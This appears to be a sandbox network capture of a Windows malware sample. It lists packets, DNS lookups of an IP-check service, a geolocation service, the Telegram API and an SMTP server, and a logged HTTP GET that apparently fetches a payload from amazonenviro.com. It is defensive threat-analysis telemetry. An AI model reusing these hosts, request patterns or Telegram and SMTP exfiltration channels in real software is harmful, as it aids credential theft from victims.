Jan 6, 2025 07:58:27.950328112 CET	49783	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:27.950341940 CET	443	49783	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:27.954271078 CET	80	49779	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:27.954339981 CET	49779	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:28.080866098 CET	443	49782	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:28.082393885 CET	49782	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:28.082432032 CET	443	49782	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:28.216501951 CET	443	49782	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:28.216569901 CET	443	49782	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:28.216631889 CET	49782	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:28.216998100 CET	49782	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:28.220038891 CET	49780	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:28.221059084 CET	49784	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:28.225024939 CET	80	49780	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:28.225104094 CET	49780	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:28.225882053 CET	80	49784	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:28.225936890 CET	49784	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:28.226015091 CET	49784	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:28.230814934 CET	80	49784	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:28.557621956 CET	443	49783	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:28.557759047 CET	49783	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:28.559124947 CET	49783	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:28.559135914 CET	443	49783	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:28.559365988 CET	443	49783	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:28.560679913 CET	49783	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:28.607323885 CET	443	49783	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:28.807022095 CET	443	49783	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:28.807090044 CET	443	49783	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:28.807197094 CET	49783	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:28.809380054 CET	49783	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:28.910039902 CET	80	49784	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:28.911098003 CET	49785	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:28.911142111 CET	443	49785	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:28.911252022 CET	49785	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:28.911561966 CET	49785	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:28.911572933 CET	443	49785	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:28.958158970 CET	49784	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:29.374897003 CET	443	49785	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:29.378669977 CET	49785	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:29.378703117 CET	443	49785	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:29.517174006 CET	443	49785	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:29.517242908 CET	443	49785	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:29.517327070 CET	49785	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:29.517793894 CET	49785	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:29.521483898 CET	49784	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:29.522066116 CET	49786	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:29.526556969 CET	80	49784	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:29.526637077 CET	49784	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:29.527350903 CET	80	49786	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:29.527411938 CET	49786	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:29.527501106 CET	49786	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:29.532690048 CET	80	49786	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:30.211429119 CET	80	49786	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:30.212614059 CET	49787	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:30.212656021 CET	443	49787	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:30.212730885 CET	49787	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:30.212969065 CET	49787	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:30.212981939 CET	443	49787	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:30.254986048 CET	49786	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:30.667139053 CET	443	49787	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:30.668622971 CET	49787	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:30.668647051 CET	443	49787	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:30.815967083 CET	443	49787	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:30.816026926 CET	443	49787	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:30.816132069 CET	49787	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:30.816616058 CET	49787	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:30.820211887 CET	49786	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:30.821156979 CET	49788	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:30.825232029 CET	80	49786	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:30.825314045 CET	49786	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:30.826052904 CET	80	49788	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:30.826128006 CET	49788	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:30.826227903 CET	49788	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:30.830964088 CET	80	49788	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:31.530226946 CET	80	49788	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:31.531512976 CET	49789	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:31.531573057 CET	443	49789	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:31.531708002 CET	49789	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:31.531898975 CET	49789	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:31.531915903 CET	443	49789	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:31.583220959 CET	49788	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:31.987529993 CET	443	49789	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:31.989379883 CET	49789	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:31.989423990 CET	443	49789	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:32.128010988 CET	443	49789	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:32.128070116 CET	443	49789	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:32.128211975 CET	49789	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:32.128652096 CET	49789	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:32.138448954 CET	49788	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:32.139113903 CET	49790	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:32.143487930 CET	80	49788	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:32.143595934 CET	49788	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:32.143934965 CET	80	49790	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:32.144017935 CET	49790	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:32.144109011 CET	49790	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:32.149146080 CET	80	49790	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:32.958971024 CET	80	49790	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:32.960809946 CET	49791	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:32.960849047 CET	443	49791	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:32.960905075 CET	49791	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:32.961369038 CET	49791	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:32.961385965 CET	443	49791	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:33.005038977 CET	49790	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:33.417290926 CET	443	49791	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:33.419538021 CET	49791	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:33.419579029 CET	443	49791	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:33.543291092 CET	443	49791	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:33.543370962 CET	443	49791	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:33.543473959 CET	49791	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:33.543826103 CET	49791	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:33.546762943 CET	49790	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:33.547358990 CET	49792	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:33.551821947 CET	80	49790	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:33.551903963 CET	49790	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:33.552195072 CET	80	49792	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:33.552258968 CET	49792	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:33.552324057 CET	49792	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:33.557403088 CET	80	49792	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:34.253355026 CET	80	49792	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:34.254511118 CET	49793	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:34.254564047 CET	443	49793	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:34.254637957 CET	49793	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:34.254851103 CET	49793	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:34.254861116 CET	443	49793	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:34.301911116 CET	49792	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:34.719206095 CET	443	49793	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:34.721889973 CET	49793	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:34.721925020 CET	443	49793	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:34.859379053 CET	443	49793	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:34.859436989 CET	443	49793	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:34.859668970 CET	49793	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:34.859934092 CET	49793	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:34.890398026 CET	49792	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:34.891170979 CET	49794	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:34.891197920 CET	443	49794	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:34.891278028 CET	49794	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:34.891669989 CET	49794	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:34.891685009 CET	443	49794	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:34.895402908 CET	80	49792	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:34.895454884 CET	49792	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:34.964468002 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:34.969248056 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:34.972407103 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:35.515144110 CET	443	49794	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:35.515264988 CET	49794	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:35.516664028 CET	49794	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:35.516675949 CET	443	49794	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:35.516926050 CET	443	49794	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:35.518166065 CET	49794	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:35.527370930 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:35.527565002 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:35.532378912 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:35.559335947 CET	443	49794	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:35.678175926 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:35.678339958 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:35.683239937 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:35.765068054 CET	443	49794	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:35.765130043 CET	443	49794	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:35.765269041 CET	49794	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:35.767038107 CET	49794	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:35.838881969 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:35.839303970 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:35.844285965 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:35.997591972 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:35.997612000 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:35.997623920 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:35.997637987 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:35.997649908 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:35.997701883 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:35.997752905 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:36.000031948 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:36.004800081 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:36.153472900 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:36.157049894 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:36.161801100 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:36.307317972 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:36.310360909 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:36.315185070 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:36.460386038 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:36.461373091 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:36.466276884 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:36.612395048 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:36.612704992 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:36.617573023 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:36.762743950 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:36.762998104 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:36.767915010 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:36.913819075 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:36.914067984 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:36.918950081 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:37.067982912 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:37.068193913 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:37.073065042 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:37.223543882 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:37.223752022 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:37.228611946 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:37.394656897 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:37.395368099 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:37.395437002 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:37.395559072 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:37.395559072 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:37.395586014 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:37.400235891 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:37.400351048 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:37.400500059 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:37.400513887 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:37.400525093 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:37.400549889 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:37.564120054 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:37.614449978 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:41.790420055 CET	49776	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:42.035398006 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:42.040522099 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:42.042448044 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:42.583708048 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:42.583884954 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:42.588778973 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:42.730185032 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:42.730417967 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:42.735281944 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:42.885763884 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:42.886209011 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:42.891068935 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.038844109 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.038860083 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.038867950 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.038878918 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.038888931 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.038906097 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.038953066 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:43.039005995 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:43.041008949 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:43.045811892 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.188949108 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.192531109 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:43.197407007 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.339138031 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.341110945 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:43.345989943 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.487540960 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.488574028 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:43.493432999 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.639240026 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.639580965 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:43.644633055 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.786041975 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.786431074 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:43.791237116 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.934721947 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:43.934979916 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:43.939757109 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:44.085882902 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:44.086416960 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:44.091253996 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:44.237020016 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:44.237209082 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:44.242592096 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:44.397500038 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:44.398171902 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:44.398308039 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:44.398308039 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:44.398308039 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:44.398330927 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 07:58:44.403017998 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:44.403191090 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:44.403250933 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:44.403337955 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:44.403347015 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:44.403351068 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:44.562712908 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 07:58:44.614597082 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 08:00:03.490417957 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 08:00:03.495393991 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 08:00:03.637614965 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 08:00:03.638048887 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 08:00:03.643176079 CET	587	49770	208.91.198.176	192.168.2.4
Jan 6, 2025 08:00:03.643234015 CET	49770	587	192.168.2.4	208.91.198.176
Jan 6, 2025 08:00:14.990497112 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 08:00:14.995429039 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 08:00:15.140947104 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 08:00:15.141419888 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 08:00:15.146435022 CET	587	49795	208.91.198.176	192.168.2.4
Jan 6, 2025 08:00:15.146585941 CET	49795	587	192.168.2.4	208.91.198.176
Jan 6, 2025 08:00:22.053318977 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 08:00:22.058240891 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 08:00:22.199476957 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 08:00:22.201309919 CET	49796	587	192.168.2.4	208.91.198.176
Jan 6, 2025 08:00:22.206408978 CET	587	49796	208.91.198.176	192.168.2.4
Jan 6, 2025 08:00:22.207107067 CET	49796	587	192.168.2.4	208.91.198.176

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2025 07:57:56.770791054 CET	59340	53	192.168.2.4	1.1.1.1
Jan 6, 2025 07:57:56.805197954 CET	53	59340	1.1.1.1	192.168.2.4
Jan 6, 2025 07:58:02.780297995 CET	57582	53	192.168.2.4	1.1.1.1
Jan 6, 2025 07:58:02.787110090 CET	53	57582	1.1.1.1	192.168.2.4
Jan 6, 2025 07:58:04.000144958 CET	50023	53	192.168.2.4	1.1.1.1
Jan 6, 2025 07:58:04.008430004 CET	53	50023	1.1.1.1	192.168.2.4
Jan 6, 2025 07:58:15.626781940 CET	65307	53	192.168.2.4	1.1.1.1
Jan 6, 2025 07:58:15.633640051 CET	53	65307	1.1.1.1	192.168.2.4
Jan 6, 2025 07:58:23.471972942 CET	64217	53	192.168.2.4	1.1.1.1
Jan 6, 2025 07:58:23.764360905 CET	53	64217	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 6, 2025 07:57:56.770791054 CET	192.168.2.4	1.1.1.1	0x4f34	Standard query (0)	amazonenviro.com	A (IP address)	IN (0x0001)	false
Jan 6, 2025 07:58:02.780297995 CET	192.168.2.4	1.1.1.1	0xb6d6	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 6, 2025 07:58:04.000144958 CET	192.168.2.4	1.1.1.1	0x8d14	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 6, 2025 07:58:15.626781940 CET	192.168.2.4	1.1.1.1	0xf5f1	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 6, 2025 07:58:23.471972942 CET	192.168.2.4	1.1.1.1	0x551d	Standard query (0)	mail.techniqueqatar.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 6, 2025 07:57:56.805197954 CET	1.1.1.1	192.168.2.4	0x4f34	No error (0)	amazonenviro.com		166.62.27.188	A (IP address)	IN (0x0001)	false
Jan 6, 2025 07:58:02.787110090 CET	1.1.1.1	192.168.2.4	0xb6d6	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 6, 2025 07:58:02.787110090 CET	1.1.1.1	192.168.2.4	0xb6d6	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 6, 2025 07:58:02.787110090 CET	1.1.1.1	192.168.2.4	0xb6d6	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 6, 2025 07:58:02.787110090 CET	1.1.1.1	192.168.2.4	0xb6d6	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 6, 2025 07:58:02.787110090 CET	1.1.1.1	192.168.2.4	0xb6d6	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 6, 2025 07:58:02.787110090 CET	1.1.1.1	192.168.2.4	0xb6d6	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 6, 2025 07:58:04.008430004 CET	1.1.1.1	192.168.2.4	0x8d14	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 6, 2025 07:58:04.008430004 CET	1.1.1.1	192.168.2.4	0x8d14	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 6, 2025 07:58:15.633640051 CET	1.1.1.1	192.168.2.4	0xf5f1	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 6, 2025 07:58:23.764360905 CET	1.1.1.1	192.168.2.4	0x551d	No error (0)	mail.techniqueqatar.com		208.91.198.176	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

amazonenviro.com

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	166.62.27.188	80	6800	C:\Users\user\Desktop\yxU3AgeVTi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:57:56.888030052 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
